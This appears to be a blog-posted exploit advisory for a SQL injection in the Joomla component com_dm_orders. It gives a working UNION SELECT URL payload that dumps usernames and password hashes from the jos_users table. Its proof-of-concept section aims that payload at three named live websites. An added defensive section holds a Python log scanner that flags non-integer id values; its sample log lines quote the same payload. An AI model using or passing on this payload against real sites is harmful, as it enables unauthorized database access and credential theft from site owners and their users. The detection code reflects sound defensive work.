Joomla Components [ com_dm_orders ] SQL Injection Vuln

[o] com_dm_orders SQL Vulnerability
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/



[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54
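
For defenders, an added example (not part of the original advisory): a check over web access logs that flags requests to com_dm_orders whose id parameter is not a plain integer, which is how the exploit URL above shows up after URL decoding. The log lines are constructed samples, and treating id as integer-only is an assumption drawn from the URL shape.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format; IPs are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=12&Itemid=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1 HTTP/1.1" 200 7311',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_dm_orders&task=order_form&id=-1%20UNION%20SELECT%201,group_concat%28username,0x3a,password%29,3+from+jos_users--&Itemid=1 HTTP/1.1" 200 7311',
    '192.0.2.44 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=5:about-union-select HTTP/1.1" 200 900',
    '198.51.100.20 - - [01/Jan/2010:10:02:00 +0000] "GET /index.php?option=com_dm_orders&task=order_form&id=7%27&Itemid=1 HTTP/1.1" 500 310',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens taken from the exploit string in the advisory, matched after decoding.
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|group_concat\s*\(|\bjos_users\b|--", re.I)


def inspect_line(line):
    """Return [(reason, decoded_id), ...] for a suspicious com_dm_orders request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs decodes both '+' and %XX, so encoded variants normalise to one form.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_dm_orders":
        return None  # other components use different id formats (e.g. "5:slug")
    findings = []
    for value in query.get("id", []):
        if not re.fullmatch(r"\d+", value):  # assumption: a legitimate id is digits only
            reason = "sql-tokens" if SQL_TOKENS.search(value) else "non-numeric"
            findings.append((reason, value))
    return findings or None


def scan(lines):
    """Return (line_number, client_ip, reason) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        findings = inspect_line(line)
        if findings:
            hits.append((n, line.split()[0], findings[0][0]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the component itself before the value reaches the query, is what removes the injection; the log check only tells you whether someone has tried it.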

Comments

Anonymous said…
I've been using greensql for a while and all my joomla customers are satisfied, www.greensql.net
evilc0de said…
what do you mean by that?